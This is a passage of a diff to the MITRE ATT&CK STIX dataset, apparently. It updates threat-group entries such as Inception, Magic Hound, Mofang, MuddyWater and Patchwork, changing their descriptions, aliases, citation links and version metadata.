+ "x_mitre_contributors": [
+ "Trend Micro Incorporated"
+ ],
"x_mitre_version": "1.1"
},
{
@@ -187838,7 +215843,7 @@
"description": "(Citation: McAfee Honeybee)"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -187854,10 +215859,65 @@
"aliases": [
"Honeybee"
],
- "modified": "2020-03-30T02:17:35.560Z",
+ "modified": "2020-04-16T19:41:40.359Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "1.1"
},
+ {
+ "id": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "type": "intrusion-set",
+ "name": "Inception",
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)",
+ "external_references": [
+ {
+ "external_id": "G0100",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0100"
+ },
+ {
+ "source_name": "Inception",
+ "description": "(Citation: Symantec Inception Framework March 2018)"
+ },
+ {
+ "source_name": "Inception Framework",
+ "description": "(Citation: Symantec Inception Framework March 2018)"
+ },
+ {
+ "source_name": "Cloud Atlas",
+ "description": "(Citation: Kaspersky Cloud Atlas December 2014)"
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "aliases": [
+ "Inception",
+ "Inception Framework",
+ "Cloud Atlas"
+ ],
+ "modified": "2020-05-20T20:54:12.685Z",
+ "created": "2020-05-08T17:01:04.058Z",
+ "x_mitre_contributors": [
+ "Oleg Skulkin, Group-IB"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c",
@@ -187926,9 +215986,9 @@
"Playful Dragon",
"RoyalAPT"
],
- "modified": "2020-03-30T02:22:29.963Z",
+ "modified": "2020-05-07T18:49:43.973Z",
"created": "2017-05-31T21:31:47.177Z",
- "x_mitre_version": "1.2"
+ "x_mitre_version": "1.3"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -188018,9 +216078,9 @@
"description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)"
},
{
- "source_name": "US-CERT HIDDEN COBRA June 2017",
+ "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A",
"description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA \u2013 North Korea\u2019s DDoS Botnet Infrastructure. Retrieved July 13, 2017.",
- "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+ "source_name": "US-CERT HIDDEN COBRA June 2017"
},
{
"url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf",
@@ -188033,9 +216093,9 @@
"url": "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/"
},
{
- "source_name": "Kaspersky Lazarus Under The Hood Blog 2017",
+ "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.",
"url": "https://securelist.com/lazarus-under-the-hood/77908/",
- "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019."
+ "source_name": "Kaspersky Lazarus Under The Hood Blog 2017"
},
{
"source_name": "US-CERT HOPLIGHT Apr 2019",
@@ -188060,7 +216120,7 @@
"ZINC",
"NICKEL ACADEMY"
],
- "modified": "2020-03-30T19:55:05.707Z",
+ "modified": "2020-05-06T19:32:13.572Z",
"created": "2017-05-31T21:32:03.807Z",
"x_mitre_version": "1.3"
},
@@ -188102,7 +216162,7 @@
"Leafminer",
"Raspite"
],
- "modified": "2020-03-27T00:11:12.202Z",
+ "modified": "2020-06-23T19:56:50.005Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "2.2"
},
@@ -188161,10 +216221,10 @@
],
"modified": "2020-03-30T01:06:24.797Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.1",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ]
+ ],
+ "x_mitre_version": "2.1"
},
{
"type": "intrusion-set",
@@ -188278,12 +216338,20 @@
],
"modified": "2020-03-28T21:28:33.395Z",
"created": "2019-09-13T12:37:10.394Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Matias Nicolas Porolli, ESET"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
+ "type": "intrusion-set",
+ "id": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Magic Hound",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive operations to collect intelligence, dating back as early as 2014. The group typically targets U.S. and the Middle Eastern military, as well as other organizations with government personnel, via complex social engineering campaigns.(Citation: FireEye APT35 2018)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -188295,78 +216363,80 @@
"description": "(Citation: Unit 42 Magic Hound Feb 2017)"
},
{
- "source_name": "Rocket Kitten",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the adversary group Rocket Kitten. (Citation: Unit 42 Magic Hound Feb 2017) (Citation: ClearSky Charming Kitten Dec 2017)"
- },
- {
- "source_name": "Operation Saffron Rose",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Saffron Rose. (Citation: Unit 42 Magic Hound Feb 2017)"
- },
- {
- "source_name": "Ajax Security Team",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the group Ajax Security Team. (Citation: Unit 42 Magic Hound Feb 2017)"
+ "source_name": "Cobalt Gypsy",
+ "description": "Based on overlapping hash values in reporting, Magic Hound activity appears to overlap with activity conducted by the group known as Cobalt Gypsy.(Citation: Secureworks Cobalt Gypsy Feb 2017)"
},
{
"source_name": "Operation Woolen-Goldfish",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Woolen-Goldfish. (Citation: Unit 42 Magic Hound Feb 2017)"
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Woolen-Goldfish.(Citation: Unit 42 Magic Hound Feb 2017)"
+ },
+ {
+ "source_name": "Ajax Security Team",
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the group Ajax Security Team.(Citation: Unit 42 Magic Hound Feb 2017)"
+ },
+ {
+ "source_name": "Operation Saffron Rose",
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Saffron Rose.(Citation: Unit 42 Magic Hound Feb 2017)"
+ },
+ {
+ "source_name": "Rocket Kitten",
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the adversary group Rocket Kitten.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: ClearSky Charming Kitten Dec 2017)"
+ },
+ {
+ "source_name": "Phosphorus",
+ "description": "(Citation: Microsoft Phosphorus Mar 2019)"
},
{
"source_name": "Newscaster",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters). (Citation: Unit 42 Magic Hound Feb 2017) (Citation: FireEye APT35 2018)"
- },
- {
- "source_name": "Cobalt Gypsy",
- "description": "Based on overlapping hash values in reporting, Magic Hound activity appears to overlap with activity conducted by the group known as Cobalt Gypsy. (Citation: Secureworks Cobalt Gypsy Feb 2017)"
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)"
},
{
"source_name": "APT35",
"description": "(Citation: FireEye APT35 2018)"
},
- {
- "source_name": "Unit 42 Magic Hound Feb 2017",
- "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
- },
{
"source_name": "FireEye APT35 2018",
"description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.",
"url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf"
},
+ {
+ "source_name": "Unit 42 Magic Hound Feb 2017",
+ "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+ },
+ {
+ "source_name": "Secureworks Cobalt Gypsy Feb 2017",
+ "description": "Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.",
+ "url": "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+ },
{
"source_name": "ClearSky Charming Kitten Dec 2017",
"description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
"url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
},
{
- "url": "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
- "description": "Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.",
- "source_name": "Secureworks Cobalt Gypsy Feb 2017"
+ "source_name": "Microsoft Phosphorus Mar 2019",
+ "url": "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/",
+ "description": "Burt, T.. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014. The group behind the campaign has primarily targeted organizations in the energy, government, and technology sectors that are either based or have business interests in Saudi Arabia.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)",
- "name": "Magic Hound",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "type": "intrusion-set",
"aliases": [
"Magic Hound",
- "Rocket Kitten",
- "Operation Saffron Rose",
- "Ajax Security Team",
- "Operation Woolen-Goldfish",
- "Newscaster",
"Cobalt Gypsy",
+ "Operation Woolen-Goldfish",
+ "Ajax Security Team",
+ "Operation Saffron Rose",
+ "Rocket Kitten",
+ "Phosphorus",
+ "Newscaster",
"APT35"
],
- "modified": "2020-03-30T20:57:00.818Z",
+ "modified": "2020-07-04T23:30:03.871Z",
"created": "2018-01-16T16:13:52.465Z",
"x_mitre_contributors": [
"Bryan Lee"
],
- "x_mitre_version": "1.2"
+ "x_mitre_version": "2.0"
},
{
"type": "intrusion-set",
@@ -188401,14 +216471,41 @@
"x_mitre_version": "1.1"
},
{
+ "id": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
"type": "intrusion-set",
- "id": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Molerats",
- "description": "[Molerats](https://attack.mitre.org/groups/G0021) is a politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. (Citation: DustySky) (Citation: DustySky2)",
+ "name": "Mofang",
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)",
+ "external_references": [
+ {
+ "external_id": "G0103",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0103"
+ },
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "aliases": [
+ "Mofang"
+ ],
+ "modified": "2020-05-29T03:30:39.739Z",
+ "created": "2020-05-12T21:23:59.021Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created": "2017-05-31T21:31:55.093Z",
+ "modified": "2020-07-01T22:11:04.389Z",
+ "aliases": [
+ "Molerats",
+ "Operation Molerats",
+ "Gaza Cybergang"
+ ],
"external_references": [
{
"external_id": "G0021",
@@ -188425,17 +216522,21 @@
},
{
"source_name": "Gaza Cybergang",
- "description": "(Citation: DustySky)"
+ "description": "(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)"
},
{
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf",
"source_name": "DustySky",
"description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
- "source_name": "DustySky2",
+ "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
"description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.",
- "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf"
+ "source_name": "DustySky2"
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
},
{
"source_name": "FireEye Operation Molerats",
@@ -188443,21 +216544,29 @@
"url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html"
}
],
- "aliases": [
- "Molerats",
- "Operation Molerats",
- "Gaza Cybergang"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-30T19:10:28.674Z",
- "created": "2017-05-31T21:31:55.093Z",
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) is a politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)",
+ "name": "Molerats",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "type": "intrusion-set",
"x_mitre_version": "1.1"
},
{
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-05-29T01:24:36.860Z",
+ "aliases": [
+ "MuddyWater",
+ "Seedworm",
+ "TEMP.Zagros"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "MuddyWater",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -188494,19 +216603,22 @@
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
},
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ },
{
"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
}
],
- "aliases": [
- "MuddyWater",
- "Seedworm",
- "TEMP.Zagros"
- ],
- "modified": "2020-03-30T02:33:35.792Z",
- "created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "2.2"
},
{
@@ -188552,14 +216664,6 @@
"x_mitre_version": "1.0"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Naikon",
- "description": "[Naikon](https://attack.mitre.org/groups/G0019) is a threat group that has focused on targets around the South China Sea. (Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). (Citation: CameraShy) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"external_id": "G0019",
@@ -188567,8 +216671,8 @@
"source_name": "mitre-attack"
},
{
- "description": "(Citation: Baumgartner Naikon 2015) (Citation: CameraShy) (Citation: Baumgartner Golovkin Naikon 2015)",
- "source_name": "Naikon"
+ "source_name": "Naikon",
+ "description": "(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)(Citation: Baumgartner Golovkin Naikon 2015)"
},
{
"url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf",
@@ -188586,12 +216690,20 @@
"source_name": "Baumgartner Golovkin Naikon 2015"
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) is a threat group that has focused on targets around the South China Sea.(Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau(Military Unit Cover Designator 78020).(Citation: CameraShy) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)",
+ "name": "Naikon",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "type": "intrusion-set",
"aliases": [
"Naikon"
],
- "modified": "2019-04-10T15:59:09.172Z",
+ "modified": "2020-07-03T21:48:57.725Z",
"created": "2017-05-31T21:31:54.232Z",
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -188672,9 +216784,9 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/"
},
{
- "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
+ "source_name": "Palo Alto OilRig Oct 2016",
"description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.",
- "source_name": "Palo Alto OilRig Oct 2016"
+ "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
},
{
"url": "https://pan-unit42.github.io/playbook_viewer/",
@@ -188703,13 +216815,13 @@
"HELIX KITTEN",
"APT34"
],
- "modified": "2020-03-28T21:29:21.460Z",
+ "modified": "2020-07-04T23:23:07.383Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.3",
"x_mitre_contributors": [
"Robert Falcone",
"Bryan Lee"
- ]
+ ],
+ "x_mitre_version": "1.3"
},
{
"type": "intrusion-set",
@@ -188741,10 +216853,10 @@
],
"modified": "2020-03-30T19:12:41.915Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -188776,10 +216888,10 @@
],
"modified": "2020-03-19T23:58:28.015Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
"x_mitre_contributors": [
"Ryan Becwar"
- ]
+ ],
+ "x_mitre_version": "1.2"
},
{
"type": "intrusion-set",
@@ -188837,6 +216949,10 @@
"source_name": "Patchwork",
"description": "(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
},
+ {
+ "source_name": "Hangover Group",
+ "description": "Patchwork and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)"
+ },
{
"source_name": "Dropping Elephant",
"description": "(Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
@@ -188851,7 +216967,7 @@
},
{
"source_name": "Operation Hangover",
- "description": "It is believed that the actors behind G0040 are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)"
+ "description": "It is believed that the actors behind Patchwork are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)"
},
{
"url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf",
@@ -188864,14 +216980,14 @@
"source_name": "Symantec Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
},
{
- "source_name": "Volexity Patchwork June 2018",
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
- "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+ "source_name": "Volexity Patchwork June 2018"
},
{
"url": "https://securelist.com/the-dropping-elephant-actor/75328/",
@@ -188879,14 +216995,19 @@
"source_name": "Securelist Dropping Elephant"
},
{
- "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
+ "source_name": "PaloAlto Patchwork Mar 2018",
"description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.",
- "source_name": "PaloAlto Patchwork Mar 2018"
+ "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
},
{
- "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Forcepoint Monsoon",
"description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.",
- "source_name": "Forcepoint Monsoon"
+ "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
},
{
"url": "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf",
@@ -188896,12 +217017,13 @@
],
"aliases": [
"Patchwork",
+ "Hangover Group",
"Dropping Elephant",
"Chinastrats",
"MONSOON",
"Operation Hangover"
],
- "modified": "2020-03-30T02:58:51.775Z",
+ "modified": "2020-07-03T22:15:24.309Z",
"created": "2017-05-31T21:32:07.145Z",
"x_mitre_version": "1.2"
},
@@ -189041,16 +217163,19 @@
"description": "(Citation: ESET RTM Feb 2017)"
},
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"aliases": [
"RTM"
],
- "modified": "2020-03-31T12:44:13.193Z",
+ "modified": "2020-05-12T22:16:44.650Z",
"created": "2017-05-31T21:32:10.206Z",
+ "x_mitre_contributors": [
+ "Oleg Skulkin, Group-IB"
+ ],
"x_mitre_version": "1.1"
},
{
@@ -189086,11 +217211,50 @@
"x_mitre_version": "1.2"
},
{
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0106",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0106"
+ },
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
